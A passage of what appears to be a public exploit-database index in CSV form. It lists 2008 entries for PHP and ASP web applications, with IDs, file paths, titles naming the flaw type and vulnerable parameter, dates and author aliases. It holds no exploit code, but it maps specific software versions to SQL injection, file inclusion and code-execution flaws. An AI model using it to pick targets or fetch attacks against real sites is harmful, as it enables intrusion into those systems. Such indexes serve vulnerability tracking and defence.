Injection",2008-03-18,n3w7u,php,webapps, -5276,exploits/asp/webapps/5276.txt,"ASPapp Knowledge Base - 'CatId' SQL Injection (1)",2008-03-19,xcorpitx,asp,webapps, -5277,exploits/php/webapps/5277.txt,"Joomla! Component joovideo 1.2.2 - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps, -5278,exploits/php/webapps/5278.txt,"Joomla! Component Alberghi 2.1.3 - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps, -5279,exploits/php/webapps/5279.txt,"Mambo Component Accombo 1.x - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps, -5280,exploits/php/webapps/5280.txt,"Joomla! Component Restaurante 1.0 - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps, -5281,exploits/php/webapps/5281.php,"PEEL CMS 3.x - Admin Hash Extraction / Arbitrary File Upload",2008-03-19,"Charles Fol",php,webapps, -5285,exploits/php/webapps/5285.txt,"RunCMS Module section - 'artid' SQL Injection",2008-03-20,Cr@zy_King,php,webapps, -5286,exploits/asp/webapps/5286.txt,"ASPapp Knowledge Base - SQL Injection",2008-03-20,xcorpitx,asp,webapps, -5288,exploits/php/webapps/5288.txt,"phpAddressBook 2.11 - Multiple Local File Inclusions",2008-03-21,0x90,php,webapps, -5290,exploits/php/webapps/5290.txt,"RunCMS Module Photo 3.02 - 'cid' SQL Injection",2008-03-21,S@BUN,php,webapps, -5291,exploits/php/webapps/5291.txt,"D.E. Classifieds - 'cat_id' SQL Injection",2008-03-21,S@BUN,php,webapps, -5292,exploits/php/webapps/5292.py,"PostNuke 0.764 - Blind SQL Injection",2008-03-21,The:Paradox,php,webapps, -5293,exploits/php/webapps/5293.pl,"XLPortal 2.2.4 - 'Search' SQL Injection",2008-03-21,cOndemned,php,webapps, -5294,exploits/php/webapps/5294.txt,"Joomla! Component custompages 1.1 - Remote File Inclusion",2008-03-22,Sniper456,php,webapps, -5295,exploits/php/webapps/5295.pl,"PHP-Nuke Platinum 7.6.b.5 - 'dynamic_titles.php' SQL Injection",2008-03-22,Inphex,php,webapps, -5296,exploits/php/webapps/5296.txt,"Cuteflow Bin 1.5.0 - 'login.php' Local File Inclusion",2008-03-22,KnocKout,php,webapps, -5297,exploits/php/webapps/5297.txt,"Joomla! Component rekry 1.0.0 - 'op_id' SQL Injection",2008-03-23,Sniper456,php,webapps, -5298,exploits/php/webapps/5298.py,"Destar 0.2.2-5 - Arbitrary Add New User",2008-03-23,nonroot,php,webapps, -5299,exploits/php/webapps/5299.txt,"Joomla! Component d3000 1.0.0 - SQL Injection",2008-03-23,S@BUN,php,webapps, -5300,exploits/php/webapps/5300.txt,"Joomla! Component Cinema 1.0 - SQL Injection",2008-03-23,S@BUN,php,webapps, -5301,exploits/php/webapps/5301.txt,"phpBB Module XS-Mod 2.3.1 - Local File Inclusion",2008-03-24,bd0rk,php,webapps, -5302,exploits/php/webapps/5302.txt,"PowerBook 1.21 - 'index.php' Local File Inclusion",2008-03-24,DSecRG,php,webapps, -5303,exploits/php/webapps/5303.txt,"PowerPHPBoard 1.00b - Multiple Local File Inclusions",2008-03-24,DSecRG,php,webapps, -5304,exploits/cgi/webapps/5304.txt,"HIS-Webshop - 'his-webshop.pl t' Remote File Disclosure",2008-03-24,"Zero X",cgi,webapps, -5305,exploits/php/webapps/5305.py,"Destar 0.2.2-5 - Arbitrary Add Admin",2008-03-24,nonroot,php,webapps, -5308,exploits/php/webapps/5308.txt,"e107 Plugin My_Gallery 2.3 - Arbitrary File Download",2008-03-25,"Jerome Athias",php,webapps, -5309,exploits/php/webapps/5309.txt,"BolinOS 4.6.1 - Local File Inclusion / Cross-Site Scripting",2008-03-25,DSecRG,php,webapps, -5310,exploits/php/webapps/5310.txt,"Joomla! Component Alphacontent 2.5.8 - 'id' SQL Injection",2008-03-25,cO2,php,webapps, -5311,exploits/php/webapps/5311.txt,"TopperMod 2.0 - SQL Injection",2008-03-25,girex,php,webapps, -5312,exploits/php/webapps/5312.txt,"TopperMod 1.0 - 'mod.php' Local File Inclusion",2008-03-25,girex,php,webapps, -5317,exploits/php/webapps/5317.txt,"JAF CMS 4.0 RC2 - Multiple Remote File Inclusions",2008-03-26,CraCkEr,php,webapps, -5318,exploits/php/webapps/5318.txt,"Joomla! Component MyAlbum 1.0 - 'album' SQL Injection",2008-03-28,parad0x,php,webapps, -5319,exploits/php/webapps/5319.pl,"AuraCMS 2.x - '/user.php' Security Code Bypass / Arbitrary Add Administrator",2008-03-28,NTOS-Team,php,webapps, -5322,exploits/php/webapps/5322.txt,"Smoothflash - 'cid' SQL Injection",2008-03-30,S@BUN,php,webapps, -5323,exploits/php/webapps/5323.pl,"mxBB Module mx_blogs 2.0.0-beta - Remote File Inclusion",2008-03-30,bd0rk,php,webapps, -5324,exploits/php/webapps/5324.txt,"KISGB (tmp_theme) 5.1.1 - Local File Inclusion",2008-03-30,Cr@zy_King,php,webapps, -5325,exploits/php/webapps/5325.txt,"JShop 1.x < 2.x - 'xPage' Local File Inclusion",2008-03-30,v0l4arrra,php,webapps, -5326,exploits/php/webapps/5326.txt,"WordPress Plugin Download - 'dl_id' SQL Injection",2008-03-31,BL4CK,php,webapps, -5328,exploits/php/webapps/5328.txt,"PHPSpamManager 0.53b - 'body.php' Remote File Disclosure",2008-03-31,GoLd_M,php,webapps, -5329,exploits/php/webapps/5329.txt,"Woltlab Burning Board Addon JGS-Treffen 2.0.2 - SQL Injection",2008-03-31,anonymous,php,webapps, -5331,exploits/php/webapps/5331.pl,"Neat weblog 0.2 - 'articleId' SQL Injection",2008-03-31,"Khashayar Fereidani",php,webapps, -5333,exploits/php/webapps/5333.txt,"EasyNews 40tr - SQL Injection / Cross-Site Scripting / Local File Inclusion",2008-04-01,"Khashayar Fereidani",php,webapps, -5334,exploits/php/webapps/5334.txt,"FaScript FaPhoto 1.0 - 'show.php' SQL Injection",2008-04-01,"Khashayar Fereidani",php,webapps, -5335,exploits/php/webapps/5335.txt,"Mambo Component Ahsshop 1.51 - 'vara' SQL Injection",2008-04-01,S@BUN,php,webapps, -5336,exploits/php/webapps/5336.pl,"EggBlog 4.0 - SQL Injection",2008-04-01,girex,php,webapps, -5337,exploits/php/webapps/5337.txt,"Joomla! Component actualite 1.0 - 'id' SQL Injection",2008-04-01,Stack,php,webapps, -5339,exploits/php/webapps/5339.php,"Nuked-klaN 1.7.6 - Multiple Vulnerabilities",2008-04-01,"Charles Fol",php,webapps, -5340,exploits/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - SQL Injection",2008-04-01,DreamTurk,php,webapps, -5345,exploits/php/webapps/5345.txt,"Joomla! Component OnlineFlashQuiz 1.0.2 - Remote File Inclusion",2008-04-02,NoGe,php,webapps, -5347,exploits/php/webapps/5347.txt,"DaZPHP 0.1 - 'prefixdir' Local File Inclusion",2008-04-02,w0cker,php,webapps, -5348,exploits/php/webapps/5348.txt,"PhpBlock a8.4 - 'PATH_TO_CODE' Remote File Inclusion",2008-04-02,w0cker,php,webapps, -5350,exploits/php/webapps/5350.txt,"KwsPHP 1.3.456 Module Galerie - 'id_gal' SQL Injection",2008-04-03,S@BUN,php,webapps, -5351,exploits/php/webapps/5351.txt,"KwsPHP 1.3.456 Module Archives - 'id' SQL Injection",2008-04-03,S@BUN,php,webapps, -5352,exploits/php/webapps/5352.txt,"KwsPHP Module jeuxflash 1.0 - 'cat' SQL Injection",2008-04-03,Houssamix,php,webapps, -5353,exploits/php/webapps/5353.txt,"KwsPHP Module ConcoursPhoto 2.0 - 'C_ID' SQL Injection",2008-04-03,Stack,php,webapps, -5358,exploits/php/webapps/5358.pl,"XPOZE Pro 3.05 - 'reed' SQL Injection",2008-04-04,t0pP8uZz,php,webapps, -5359,exploits/php/webapps/5359.txt,"Vastal I-Tech Software Zone - 'cat_id' SQL Injection",2008-04-04,t0pP8uZz,php,webapps, -5360,exploits/php/webapps/5360.txt,"Sabros.us 1.75 - 'thumbnails.php' Remote File Disclosure",2008-04-04,HaCkeR_EgY,php,webapps, -5362,exploits/php/webapps/5362.txt,"Comdev News Publisher 4.1.2 - SQL Injection",2008-04-04,t0pP8uZz,php,webapps, -5363,exploits/php/webapps/5363.txt,"Affiliate Directory - 'cat_id' SQL Injection",2008-04-04,t0pP8uZz,php,webapps, -5364,exploits/php/webapps/5364.txt,"PHP Photo Gallery 1.0 - 'photo_id' SQL Injection",2008-04-04,t0pP8uZz,php,webapps, -5365,exploits/php/webapps/5365.txt,"Blogator-script 0.95 - 'incl_page' Remote File Inclusion",2008-04-04,JIKO,php,webapps, -5367,exploits/php/webapps/5367.pl,"PIGMy-SQL 1.4.1 - 'getdata.php' Blind SQL Injection",2008-04-04,t0pP8uZz,php,webapps, -5368,exploits/php/webapps/5368.txt,"Blogator-script 0.95 - 'id_art' SQL Injection",2008-04-04,"Virangar Security",php,webapps, -5369,exploits/php/webapps/5369.txt,"Dragoon 0.1 - 'lng' Local File Inclusion",2008-04-04,w0cker,php,webapps, -5370,exploits/php/webapps/5370.txt,"Blogator-script 0.95 - Change User Password",2008-04-05,"Virangar Security",php,webapps, -5371,exploits/php/webapps/5371.txt,"Entertainment Directory 1.1 - SQL Injection",2008-04-05,t0pP8uZz,php,webapps, -5372,exploits/php/webapps/5372.txt,"Easynet Forum Host - 'forum.php' SQL Injection",2008-04-05,t0pP8uZz,php,webapps, -5373,exploits/asp/webapps/5373.txt,"Cobalt 0.1 - Multiple SQL Injections",2008-04-05,U238,asp,webapps, -5374,exploits/php/webapps/5374.txt,"Gaming Directory 1.0 - 'cat_id' SQL Injection",2008-04-05,t0pP8uZz,php,webapps, -5375,exploits/php/webapps/5375.txt,"visualpic 0.3.1 - Remote File Inclusion",2008-04-05,Cr@zy_King,php,webapps, -5376,exploits/php/webapps/5376.pl,"Picture Rating 1.0 - Blind SQL Injection",2008-04-05,t0pP8uZz,php,webapps, -5377,exploits/php/webapps/5377.txt,"Links Directory 1.1 - 'cat_id' SQL Injection",2008-04-05,t0pP8uZz,php,webapps, -5378,exploits/php/webapps/5378.txt,"Software Index 1.1 - 'cid' SQL Injection",2008-04-05,t0pP8uZz,php,webapps, -5379,exploits/php/webapps/5379.txt,"MyBB Plugin Custom Pages 1.0 - SQL Injection",2008-04-06,Lidloses_Auge,php,webapps, -5380,exploits/php/webapps/5380.txt,"Blog PixelMotion - 'sauvBase.php' Arbitrary Database Backup",2008-04-06,JIKO,php,webapps, -5381,exploits/php/webapps/5381.txt,"Blog PixelMotion - 'modif_config.php' Arbitrary File Upload",2008-04-06,JIKO,php,webapps, -5382,exploits/php/webapps/5382.txt,"Blog PixelMotion - 'categorie' SQL Injection",2008-04-06,parad0x,php,webapps, -5383,exploits/php/webapps/5383.txt,"Site Sift Listings - 'id' SQL Injection",2008-04-06,S@BUN,php,webapps, -5384,exploits/php/webapps/5384.txt,"Prozilla Top 100 1.2 - Arbitrary Delete Stats",2008-04-06,t0pP8uZz,php,webapps, -5385,exploits/php/webapps/5385.txt,"Prozilla Forum Service - 'forum' SQL Injection",2008-04-06,t0pP8uZz,php,webapps, -5387,exploits/php/webapps/5387.txt,"Prozilla Reviews Script 1.0 - Arbitrary Delete User",2008-04-06,t0pP8uZz,php,webapps, -5388,exploits/php/webapps/5388.txt,"Prozilla Topsites 1.0 - Arbitrary Edit/Add Users",2008-04-06,t0pP8uZz,php,webapps, -5389,exploits/php/webapps/5389.txt,"Prozilla Cheat Script 2.0 - 'id' SQL Injection",2008-04-06,t0pP8uZz,php,webapps, -5390,exploits/php/webapps/5390.txt,"Prozilla Freelancers - 'project' SQL Injection",2008-04-07,t0pP8uZz,php,webapps, -5391,exploits/php/webapps/5391.php,"Drake CMS 0.4.11 - Blind SQL Injection",2008-04-07,EgiX,php,webapps, -5392,exploits/php/webapps/5392.php,"LinPHA 1.3.3 Plugin Maps - Remote Command Execution",2008-04-07,EgiX,php,webapps, -5393,exploits/php/webapps/5393.txt,"Dragoon 0.1 - 'root' Remote File Inclusion",2008-04-07,RoMaNcYxHaCkEr,php,webapps, -5394,exploits/php/webapps/5394.txt,"Mole 2.1.0 - 'viewsource.php' Remote File Disclosure",2008-04-07,GoLd_M,php,webapps, -5399,exploits/php/webapps/5399.txt,"ChartDirector 4.1 - 'viewsource.php' File Disclosure",2008-04-07,Stack,php,webapps, -5400,exploits/php/webapps/5400.txt,"724CMS 4.01 Enterprise - 'index.php' SQL Injection",2008-04-07,Lidloses_Auge,php,webapps, -5401,exploits/php/webapps/5401.txt,"My Gaming Ladder 7.5 - 'ladderid' SQL Injection",2008-04-07,t0pP8uZz,php,webapps, -5402,exploits/php/webapps/5402.txt,"iScripts Socialware - 'id' SQL Injection",2008-04-07,t0pP8uZz,php,webapps, -5404,exploits/php/webapps/5404.php,"phpTournois G4 - Arbitrary File Upload / Code Execution",2008-04-08,"Charles Fol",php,webapps, -5405,exploits/php/webapps/5405.txt,"ExBB 0.22 - Local/Remote File Inclusion",2008-04-08,The:Paradox,php,webapps, -5406,exploits/php/webapps/5406.txt,"Pligg CMS 9.9.0 - 'editlink.php' SQL Injection",2008-04-08,"Guido Landi",php,webapps, -5407,exploits/php/webapps/5407.php,"FLABER 1.1 RC1 - Remote Command Execution",2008-04-08,EgiX,php,webapps, -5408,exploits/php/webapps/5408.pl,"LokiCMS 0.3.3 - Remote Command Execution",2008-04-08,girex,php,webapps, -5409,exploits/asp/webapps/5409.txt,"SuperNET Shop 1.0 - SQL Injection",2008-04-08,U238,asp,webapps, -5410,exploits/php/webapps/5410.txt,"Prediction Football 1.x - 'matchid' SQL Injection",2008-04-08,0in,php,webapps, -5411,exploits/php/webapps/5411.txt,"Dream4 Koobi Pro 6.25 Links - 'categ' SQL Injection",2008-04-08,S@BUN,php,webapps, -5412,exploits/php/webapps/5412.txt,"Dream4 Koobi Pro 6.25 Shop - 'categ' SQL Injection",2008-04-08,S@BUN,php,webapps, -5413,exploits/php/webapps/5413.txt,"Dream4 Koobi Pro 6.25 Gallery - 'galid' SQL Injection",2008-04-08,S@BUN,php,webapps, -5414,exploits/php/webapps/5414.txt,"Dream4 Koobi Pro 6.25 Showimages - 'galid' SQL Injection",2008-04-08,S@BUN,php,webapps, -5415,exploits/php/webapps/5415.txt,"Dream4 Koobi 4.4/5.4 - gallery SQL Injection",2008-04-08,S@BUN,php,webapps, -5417,exploits/php/webapps/5417.html,"phpBB Addon Fishing Cat Portal - Remote File Inclusion",2008-04-09,bd0rk,php,webapps, -5418,exploits/php/webapps/5418.pl,"KnowledgeQuest 2.5 - Arbitrary Add Admin",2008-04-09,t0pP8uZz,php,webapps, -5419,exploits/php/webapps/5419.txt,"Free Photo Gallery Site Script - 'path' File Disclosure",2008-04-09,JIKO,php,webapps, -5420,exploits/php/webapps/5420.txt,"Phaos R4000 Version - 'file' Remote File Disclosure",2008-04-09,HaCkeR_EgY,php,webapps, -5421,exploits/php/webapps/5421.txt,"KnowledgeQuest 2.6 - SQL Injection",2008-04-09,"Virangar Security",php,webapps, -5422,exploits/php/webapps/5422.pl,"LiveCart 1.1.1 - 'id' Blind SQL Injection",2008-04-10,irvian,php,webapps, -5423,exploits/php/webapps/5423.txt,"Ksemail - Local File Inclusion",2008-04-10,dun,php,webapps, -5425,exploits/php/webapps/5425.pl,"LightNEasy 1.2 - no database Remote Hash Retrieve",2008-04-10,girex,php,webapps, -5426,exploits/php/webapps/5426.txt,"RX Maxsoft - 'fotoID' SQL Injection",2008-04-10,S@BUN,php,webapps, -5428,exploits/php/webapps/5428.txt,"PHPKB Knowledge Base Software 1.5 - 'ID' SQL Injection",2008-04-11,parad0x,php,webapps, -5429,exploits/php/webapps/5429.txt,"NewsOffice 1.1 - Remote File Inclusion",2008-04-11,RoMaNcYxHaCkEr,php,webapps, -5431,exploits/php/webapps/5431.txt,"Joomla! Component JoomlaXplorer 1.6.2 - Remote s",2008-04-11,Houssamix,php,webapps, -5432,exploits/php/webapps/5432.txt,"PHPAddressBook 2.11 - 'view.php' SQL Injection",2008-04-11,Cr@zy_King,php,webapps, -5433,exploits/php/webapps/5433.txt,"CcMail 1.0.1 - Insecure Cookie Handling",2008-04-12,t0pP8uZz,php,webapps, -5434,exploits/php/webapps/5434.pl,"1024 CMS 1.4.2 - Local File Inclusion / Blind SQL Injection",2008-04-13,girex,php,webapps, -5435,exploits/php/webapps/5435.txt,"Joomla! Component com_extplorer 2.0.0 RC2 - Local Directory Traversal",2008-04-13,Houssamix,php,webapps, -5436,exploits/php/webapps/5436.txt,"Pollbooth 2.0 - 'pollID' SQL Injection",2008-04-13,S@BUN,php,webapps, -5437,exploits/php/webapps/5437.txt,"CPCommerce 1.1.0 - Cross-Site Scripting / Local File Inclusion",2008-04-13,BugReport.IR,php,webapps, -5439,exploits/php/webapps/5439.txt,"PostCard 1.0 - Remote Insecure Cookie Handling",2008-04-13,t0pP8uZz,php,webapps, -5440,exploits/php/webapps/5440.php,"Mumbo Jumbo Media OP4 - Blind SQL Injection",2008-04-13,Lidloses_Auge,php,webapps, -5441,exploits/php/webapps/5441.txt,"SmallBiz 4 Seasons CMS - SQL Injection",2008-04-14,cO2,php,webapps, -5443,exploits/php/webapps/5443.txt,"SmallBiz eShop - 'content_id' SQL Injection",2008-04-14,Stack,php,webapps, -5444,exploits/php/webapps/5444.txt,"BosClassifieds 3.0 - 'index.php' SQL Injection",2008-04-14,"SoSo H H",php,webapps, -5446,exploits/php/webapps/5446.txt,"BosNews 4.0 - 'article' SQL Injection",2008-04-14,Crackers_Child,php,webapps, -5447,exploits/php/webapps/5447.txt,"Dream4 Koobi CMS 4.2.4/4.2.5/4.3.0 - Multiple SQL Injections",2008-04-14,JosS,php,webapps, -5448,exploits/php/webapps/5448.txt,"Dream4 Koobi Pro 6.25 Poll - 'poll_id' SQL Injection",2008-04-14,S@BUN,php,webapps, -5449,exploits/php/webapps/5449.php,"KwsPHP - 'Upload' Remote Code Execution",2008-04-14,Ajax,php,webapps, -5450,exploits/php/webapps/5450.txt,"Classifieds Caffe - 'cat_id' SQL Injection",2008-04-15,JosS,php,webapps, -5452,exploits/php/webapps/5452.txt,"LightNEasy sqlite / no database 1.2.2 - Multiple Vulnerabilities",2008-04-15,girex,php,webapps, -5454,exploits/php/webapps/5454.txt,"LaserNet CMS 1.5 - SQL Injection",2008-04-15,cO2,php,webapps, -5456,exploits/asp/webapps/5456.txt,"Carbon Communities 2.4 - Multiple Vulnerabilities",2008-04-16,BugReport.IR,asp,webapps, -5457,exploits/php/webapps/5457.txt,"XplodPHP AutoTutorials 2.1 - 'id' SQL Injection",2008-04-16,cO2,php,webapps, -5459,exploits/php/webapps/5459.txt,"e107 module 123 flash chat 6.8.0 - Remote File Inclusion",2008-04-17,by_casper41,php,webapps, -5463,exploits/php/webapps/5463.txt,"Grape Statistics 0.2a - 'location' Remote File Inclusion",2008-04-18,MajnOoNxHaCkEr,php,webapps, -5464,exploits/php/webapps/5464.txt,"5th Avenue Shopping Cart - 'category_id' SQL Injection",2008-04-18,"Aria-Security Team",php,webapps, -5465,exploits/php/webapps/5465.txt,"2532/Gigs 1.2.2 - Arbitrary Database Backup/Download",2008-04-18,t0pP8uZz,php,webapps, -5466,exploits/php/webapps/5466.pl,"OpenInvoice 0.9 - Arbitrary Change User Password",2008-04-18,t0pP8uZz,php,webapps, -5467,exploits/php/webapps/5467.txt,"PhShoutBox 1.5 - Insecure Cookie Handling",2008-04-18,t0pP8uZz,php,webapps, -5468,exploits/php/webapps/5468.txt,"Simple Customer 1.2 - 'contact.php' SQL Injection",2008-04-18,t0pP8uZz,php,webapps, -5469,exploits/php/webapps/5469.txt,"AllMyGuests 0.4.1 - 'AMG_id' SQL Injection",2008-04-19,Player,php,webapps, -5470,exploits/php/webapps/5470.py,"PHP-Fusion 6.01.14 - Blind SQL Injection",2008-04-19,The:Paradox,php,webapps, -5471,exploits/php/webapps/5471.txt,"Apartment Search Script - 'listtest.php' SQL Injection",2008-04-19,Crackers_Child,php,webapps, -5473,exploits/php/webapps/5473.pl,"XOOPS Module Recipe 2.2 - 'detail.php' SQL Injection",2008-04-19,S@BUN,php,webapps, -5474,exploits/php/webapps/5474.txt,"Aterr 0.9.1 - PHP5 Local File Inclusion",2008-04-19,KnocKout,php,webapps, -5475,exploits/asp/webapps/5475.txt,"W1L3D4 philboard 1.0 - 'philboard_reply.asp' SQL Injection",2008-04-20,U238,asp,webapps, -5476,exploits/php/webapps/5476.txt,"HostDirectory Pro - Insecure Cookie Handling",2008-04-20,Crackers_Child,php,webapps, -5477,exploits/php/webapps/5477.txt,"KubeLance 1.6.4 - 'ipn.php' Local File Inclusion",2008-04-20,Crackers_Child,php,webapps, -5478,exploits/php/webapps/5478.txt,"Acidcat CMS 3.4.1 - Multiple Vulnerabilities",2008-04-20,BugReport.IR,php,webapps, -5480,exploits/php/webapps/5480.txt,"BlogWorx 1.0 - 'id' SQL Injection",2008-04-21,U238,php,webapps, -5481,exploits/php/webapps/5481.txt,"Crazy Goomba 1.2.1 - 'id' SQL Injection",2008-04-21,ZoRLu,php,webapps, -5482,exploits/asp/webapps/5482.py,"RedDot CMS 7.5 - 'LngId' SQL Injection",2008-04-21,"IRM Plc.",asp,webapps, -5483,exploits/php/webapps/5483.txt,"TR News 2.1 - 'nb' SQL Injection",2008-04-21,His0k4,php,webapps, -5484,exploits/php/webapps/5484.txt,"Joomla! Component FlippingBook 1.0.4 - SQL Injection",2008-04-22,cO2,php,webapps, -5485,exploits/php/webapps/5485.pl,"Web Calendar 4.1 - Blind SQL Injection",2008-04-22,t0pP8uZz,php,webapps, -5486,exploits/php/webapps/5486.txt,"WordPress Plugin Spreadsheet 0.6 - SQL Injection",2008-04-22,1ten0.0net1,php,webapps, -5487,exploits/php/webapps/5487.txt,"E RESERV 2.1 - 'index.php' SQL Injection",2008-04-23,JIKO,php,webapps, -5488,exploits/php/webapps/5488.txt,"Joomla! Component Filiale 1.0.4 - 'idFiliale' SQL Injection",2008-04-23,str0xo,php,webapps, -5490,exploits/php/webapps/5490.pl,"YouTube Clone Script - 'spages.php' Remote Code Execution",2008-04-23,Inphex,php,webapps, -5491,exploits/php/webapps/5491.txt,"Joomla! Component Community Builder 1.0.1 - Blind SQL Injection",2008-04-23,$hur!k'n,php,webapps, -5493,exploits/php/webapps/5493.txt,"Joomla! Component JPad 1.0 - Authenticated SQL Injection",2008-04-24,His0k4,php,webapps, -5494,exploits/php/webapps/5494.txt,"MiniBB 2.2 - Cross-Site Scripting / SQL Injection / Full Path Disclosure",2008-04-25,girex,php,webapps, -5495,exploits/php/webapps/5495.txt,"PostNuke Module PostSchedule 1.0 - 'eid' SQL Injection",2008-04-25,Kacper,php,webapps, -5497,exploits/php/webapps/5497.txt,"Joomla! Component Joomla-Visites 1.1 RC2 - Remote File Inclusion",2008-04-25,NoGe,php,webapps, -5499,exploits/php/webapps/5499.txt,"Siteman 2.x - Code Execution / Local File Inclusion / Cross-Site Scripting",2008-04-26,"Khashayar Fereidani",php,webapps, -5500,exploits/php/webapps/5500.txt,"PostNuke Module pnFlashGames 2.5 - SQL Injection",2008-04-26,Kacper,php,webapps, -5501,exploits/php/webapps/5501.txt,"Content Management System for Phprojekt 0.6.1 - Remote File Inclusion",2008-04-26,RoMaNcYxHaCkEr,php,webapps, -5502,exploits/php/webapps/5502.pl,"Clever Copy 3.0 - 'postview.php' SQL Injection",2008-04-26,U238,php,webapps, -5503,exploits/asp/webapps/5503.txt,"Angelo-Emlak 1.0 - Multiple SQL Injections",2008-04-26,U238,asp,webapps, -5504,exploits/php/webapps/5504.txt,"PHP Forge 3 Beta 2 - 'id' SQL Injection",2008-04-26,JIKO,php,webapps, -5505,exploits/php/webapps/5505.txt,"RunCMS Module MyArticles 0.6 Beta-1 - SQL Injection",2008-04-26,Cr@zy_King,php,webapps, -5506,exploits/php/webapps/5506.txt,"PHPizabi 0.848b C1 HFP3 - Database Information Disclosure",2008-04-26,YOUCODE,php,webapps, -5507,exploits/asp/webapps/5507.txt,"Megabbs Forum 2.2 - SQL Injection / Cross-Site Scripting",2008-04-27,BugReport.IR,asp,webapps, -5508,exploits/php/webapps/5508.txt,"Jokes Site Script - 'jokes.php' SQL Injection",2008-04-27,ProgenTR,php,webapps, -5509,exploits/php/webapps/5509.txt,"FluentCMS - 'view.php' SQL Injection",2008-04-27,cO2,php,webapps, -5510,exploits/php/webapps/5510.txt,"Content Management System for Phprojekt 0.6.1 - File Disclosure",2008-04-27,Houssamix,php,webapps, -5512,exploits/php/webapps/5512.pl,"Joomla! Component Alphacontent 2.5.8 - Blind SQL Injection",2008-04-27,cO2,php,webapps, -5513,exploits/php/webapps/5513.pl,"ODFaq 2.1.0 - Blind SQL Injection",2008-04-27,cO2,php,webapps, -5514,exploits/php/webapps/5514.pl,"Joomla! Component paxxgallery 0.2 - 'gid' Blind SQL Injection",2008-04-27,ZAMUT,php,webapps, -5516,exploits/php/webapps/5516.txt,"Prozilla Hosting Index - 'cat_id' SQL Injection",2008-04-28,K-159,php,webapps, -5517,exploits/php/webapps/5517.txt,"Softbiz Web Host Directory Script - 'host_id' SQL Injection",2008-04-28,K-159,php,webapps, -5520,exploits/php/webapps/5520.txt,"Joovili 3.1 - 'browse.videos.php' SQL Injection",2008-04-28,HaCkeR_EgY,php,webapps, -5521,exploits/php/webapps/5521.txt,"SugarCRM Community Edition 4.5.1/5.0.0 - File Disclosure",2008-04-29,"Roberto Suggi Liverani",php,webapps, -5522,exploits/php/webapps/5522.txt,"LokiCMS 0.3.3 - Arbitrary File Delete",2008-04-29,cOndemned,php,webapps, -5523,exploits/php/webapps/5523.txt,"Project Based Calendaring System (PBCS) 0.7.1 - Multiple Vulnerabilities",2008-04-30,GoLd_M,php,webapps, -5524,exploits/php/webapps/5524.txt,"OxYProject 0.85 - 'edithistory.php' Remote Code Execution",2008-04-30,GoLd_M,php,webapps, -5525,exploits/php/webapps/5525.txt,"Harris WapChat 1 - Multiple Remote File Inclusions",2008-04-30,k1n9k0ng,php,webapps, -5526,exploits/php/webapps/5526.txt,"Interact 2.4.1 - Multiple Remote File Inclusions",2008-04-30,RoMaNcYxHaCkEr,php,webapps, -5527,exploits/php/webapps/5527.pl,"Joomla! Component Webhosting - 'catid' Blind SQL Injection",2008-05-01,cO2,php,webapps, -5528,exploits/php/webapps/5528.txt,"ActualAnalyzer Lite (free) 2.78 - Local File Inclusion",2008-05-01,"Khashayar Fereidani",php,webapps, -5529,exploits/php/webapps/5529.txt,"Vlbook 1.21 - Cross-Site Scripting / Local File Inclusion",2008-05-01,"Khashayar Fereidani",php,webapps, -5531,exploits/php/webapps/5531.txt,"Open Auto Classifieds 1.4.3b - SQL Injection",2008-05-02,InjEctOr5,php,webapps, -5532,exploits/php/webapps/5532.txt,"ItCMS 1.9 - 'boxpop.php' Remote Code Execution",2008-05-02,Cod3rZ,php,webapps, -5533,exploits/php/webapps/5533.txt,"BlogMe PHP 1.1 - 'comments.php' SQL Injection",2008-05-03,His0k4,php,webapps, -5535,exploits/php/webapps/5535.txt,"SmartBlog 1.3 - 'index.php' SQL Injection",2008-05-03,His0k4,php,webapps, -5537,exploits/php/webapps/5537.txt,"phpDirectorySource 1.1 - Multiple SQL Injections",2008-05-03,InjEctOr5,php,webapps, -5538,exploits/php/webapps/5538.txt,"Cplinks 1.03 - Authentication Bypass / SQL Injection / Cross-Site Scripting",2008-05-04,InjEctOr5,php,webapps, -5539,exploits/php/webapps/5539.txt,"ScorpNews 1.0 - 'site' Remote File Inclusion",2008-05-04,Silver,php,webapps, -5540,exploits/php/webapps/5540.pl,"Scout Portal Toolkit 1.4.0 - 'ParentId' SQL Injection",2008-05-04,JosS,php,webapps, -5541,exploits/php/webapps/5541.txt,"PostNuke Module pnEncyclopedia 0.2.0 - SQL Injection",2008-05-05,K-159,php,webapps, -5542,exploits/php/webapps/5542.txt,"Online Rental Property Script 4.5 - 'pid' SQL Injection",2008-05-05,K-159,php,webapps, -5543,exploits/php/webapps/5543.txt,"Anserv Auction XL - 'cat' SQL Injection",2008-05-05,K-159,php,webapps, -5544,exploits/php/webapps/5544.txt,"Kmita Tellfriend 2.0 - 'file' Remote File Inclusion",2008-05-05,K-159,php,webapps, -5545,exploits/php/webapps/5545.txt,"Kmita Mail 3.0 - 'file' Remote File Inclusion",2008-05-05,K-159,php,webapps, -5546,exploits/php/webapps/5546.txt,"BackLinkSpider 1.1 - 'cat_id' SQL Injection",2008-05-05,K-159,php,webapps, -5548,exploits/php/webapps/5548.txt,"Miniweb 2.0 - 'historymonth' SQL Injection",2008-05-05,HaCkeR_EgY,php,webapps, -5549,exploits/php/webapps/5549.txt,"Power Editor 2.0 - Remote File Disclosure / Edit",2008-05-05,"Virangar Security",php,webapps, -5550,exploits/php/webapps/5550.php,"DeluxeBB 1.2 - Multiple Vulnerabilities",2008-05-05,EgiX,php,webapps, -5551,exploits/php/webapps/5551.txt,"Pre Shopping Mall 1.1 - 'search.php' SQL Injection",2008-05-06,t0pP8uZz,php,webapps, -5552,exploits/php/webapps/5552.txt,"PHPEasyData 1.5.4 - 'cat_id' SQL Injection",2008-05-06,InjEctOr5,php,webapps, -5553,exploits/asp/webapps/5553.txt,"FipsCMS 2.1 - 'print.asp' SQL Injection",2008-05-07,InjEctOr5,asp,webapps, -5554,exploits/php/webapps/5554.php,"Galleristic 1.0 - 'cat' SQL Injection",2008-05-07,cOndemned,php,webapps, -5555,exploits/php/webapps/5555.txt,"GameCMS Lite 1.0 - 'systemId' SQL Injection",2008-05-07,InjEctOr5,php,webapps, -5556,exploits/asp/webapps/5556.txt,"PostcardMentor - 'cat_fldAuto' SQL Injection",2008-05-07,InjEctOr5,asp,webapps, -5557,exploits/php/webapps/5557.pl,"OneCMS 2.5 - Blind SQL 